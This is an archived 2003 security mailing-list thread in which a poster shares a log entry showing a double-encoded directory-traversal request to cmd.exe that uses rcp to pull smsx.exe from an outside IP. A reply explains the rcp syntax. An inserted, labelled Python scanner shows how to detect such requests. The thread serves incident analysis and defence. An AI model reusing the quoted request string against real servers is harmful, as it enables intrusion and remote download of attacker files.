Security Incidents mailing list archives

RE: smsx.exe?


From: "Altheide, Cory B." <AltheideC () nv doe gov>
Date: Mon, 5 May 2003 17:25:32 -0700

No, adm is the user, at least according to the rcp usage instructions.

H:\>rcp

Copies files to and from computer running the RCP service.

RCP [-a | -b] [-h] [-r] [host][.user:]source [host][.user:] path\destination

  -a                 Specifies ASCII transfer mode. This mode converts
                     the EOL characters to a carriage return for UNIX
                     and a carriage
                     return/line feed for personal computers. This is
                     the default transfer mode.
  -b                 Specifies binary image transfer mode.
  -h                 Transfers hidden files.
  -r                 Copies the contents of all subdirectories;
                     destination must be a directory.
  host               Specifies the local or remote host. If host is
                     specified as an IP address OR if host name contains
                     dots, you must specify the user.
  .user:             Specifies a user name to use, rather than the
                     current user name.
  source             Specifes the files to copy.
  path\destination   Specifies the path relative to the logon directory
                     on the remote host. Use the escape characters
                     (\ , ", or ') in remote paths to use wildcard
                     characters on the remote host.

"rcp -b 195.92.252.138.adm:smsx.exe ."

RCP smsx.exe from 195.92.252.138 to . (here) as user adm.

Your windows guy should have tried typing the command with no arguments...
;-P

Cory Altheide
Computer Forensics Specialist
NCI Information Systems, Inc.
NNSA Cyber Forensics Center
altheidec () nv doe gov

-----Original Message-----
From: Steve Bromwich [mailto:incident () fop ns ca] 
Sent: Monday, May 05, 2003 10:30 AM
To: incidents () securityfocus com
Subject: smsx.exe?


Hi,

Has anyone seen a request like this in their logs?

205.247.193.56 - - [05/May/2003:11:59:52 -0300] "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."

I tried rcping smsx.exe off the remote site but no joy; is 
the .adm an obscure windows-specific port address or 
something? One of our windows guys said the smsx was "remote 
management software", but had no idea about the .adm...

On a side note, the response I got from energis (the 
195.92.252.138 owner) had the following at the start:

PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG

Further down:

Please note that if one of our IP addresses looks up to a 
'webcache' (as opposed to a modem) we have a *maximum* of 30 
hours to trace the user responsible for the abuse.

So I guess this means that Energis users have a pretty good 
chance of abusing remote servers through Energis' web cache 
and getting away with it :-/

Cheers, Steve
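An added example, not part of either message in this thread: a small Python log check that does by hand what the two posts do by eye. It peels the double URL-encoding (`%255c` -> `%5c` -> `\`) off the request path, flags requests that traverse out of the script directory into cmd.exe, and then splits the rcp argument the way the usage text Cory pasted describes it (`[host][.user:]source`), so the host, user and file name come out separately. The sample log lines are constructed; the first reproduces the request Steve quoted, the other two are benign lines to show what is not flagged. All function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample log. Line 1 is the request from the thread; lines 2 and 3
# are made-up benign requests (one of them double-encoded but harmless).
SAMPLE_LOG = [
    '205.247.193.56 - - [05/May/2003:11:59:52 -0300] '
    '"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."',
    '10.0.0.7 - - [05/May/2003:12:01:03 -0300] "/index.html"',
    '10.0.0.9 - - [05/May/2003:12:02:40 -0300] "/search?q=a%2520b"',
]

# "/../" after normalisation, anchored at a path separator on both sides
TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)"')


def fully_decode(path, max_rounds=3):
    """URL-decode repeatedly until the string stops changing.

    Returns (decoded, rounds). %255c needs two rounds: %255c -> %5c -> \\.
    A bounded loop keeps a pathological input from spinning forever.
    """
    rounds = 0
    while rounds < max_rounds:
        new = unquote(path)
        if new == path:
            break
        path = new
        rounds += 1
    return path, rounds


def analyze_request(raw_path):
    """Decode and normalise one request path; report what a filter should see."""
    decoded, rounds = fully_decode(raw_path)
    normalized = decoded.replace('\\', '/').lower()
    url_part, _, query = normalized.partition('?')
    return {
        'decode_rounds': rounds,
        'traversal': bool(TRAVERSAL.search(url_part)),
        'cmd_exe': url_part.endswith('/cmd.exe'),
        'query': query,
    }


def parse_rcp_arg(arg):
    """Split an rcp file argument as the usage text defines it: [host][.user:]source.

    The last dot before the colon separates host from user, which is why the
    usage text says a dotted host name or an IP address must carry a .user: part.
    Returns (host, user, source); host/user are None when absent.
    """
    if ':' not in arg:
        return None, None, arg
    prefix, source = arg.split(':', 1)
    if '.' in prefix:
        host, user = prefix.rsplit('.', 1)
        return host, user, source
    return prefix, None, source


def extract_rcp_transfer(query):
    """Pull host/user/source/destination out of a '/c+rcp+...' query string."""
    tokens = [t for t in query.split('+') if t]
    if 'rcp' not in tokens:
        return None
    # drop option flags such as -b; what remains is source and destination
    args = [t for t in tokens[tokens.index('rcp') + 1:] if not t.startswith('-')]
    if len(args) < 2:
        return None
    host, user, source = parse_rcp_arg(args[0])
    return {'host': host, 'user': user, 'source': source, 'destination': args[1]}


def scan_log(lines):
    """Return one finding per line that traverses into cmd.exe."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, stamp, request = m.groups()
        parts = request.split()
        path = parts[1] if len(parts) >= 2 else parts[0]  # "GET /x HTTP/1.0" or bare "/x"
        info = analyze_request(path)
        if info['traversal'] and info['cmd_exe']:
            findings.append({'client': client, 'time': stamp,
                             'decode_rounds': info['decode_rounds'],
                             'rcp': extract_rcp_transfer(info['query'])})
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Running it prints a single finding for the first line: two decode rounds, host 195.92.252.138, user adm, source smsx.exe, destination `.`, which is exactly Cory's reading of the command. Checking only the raw, single-decoded path would miss this request, which is the reason the check decodes until the string stops changing.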

--------------------------------------------------------------
--------------
Attend Black Hat Briefings & Training Europe, May 12-15 in 
Amsterdam, the 
world's premier event for IT and network security experts.  
The two-day 
Training features 6 hand-on courses on May 12-13 taught by 
professionals.  
The two-day Briefings on May 14-15 features 24 top speakers 
with no vendor 
sales pitches.  Deadline for the best rates is April 25.  
Register today to 
ensure your place. http://www.securityfocus.com/BlackHat-incidents 
--------------------------------------------------------------
--------------



